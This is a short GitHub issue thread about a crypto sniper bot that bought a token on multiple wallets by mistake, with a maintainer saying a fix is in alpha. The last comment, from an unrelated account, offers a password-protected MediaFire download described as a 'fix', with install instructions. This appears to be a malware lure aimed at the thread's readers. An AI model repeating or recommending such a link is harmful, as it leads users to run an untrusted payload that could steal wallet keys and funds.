### ISSUE TITLE
Max tx / wallets bug?

### ISSUE THREAD

**Issue by DDbullet** [TradersClubB/bullet-app#45]
I tried to buy 0.05 eth in a new launched coin without having bullet router on. The sniper identified wrong the max tx and sniped my ammount on 5 wallets (even if i didn't had multi wallets, router on)

![multiwallets](https://user-images.githubusercontent.com/124812952/221219010-2876c783-9365-41a6-974a-5a7135f285e6.jpg)

Order id: 63f8d3e3e832b8059a226bb5

**Comment by icex** [comment]
fixed in alpha. pls test it and if it is ok we deploy to main.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
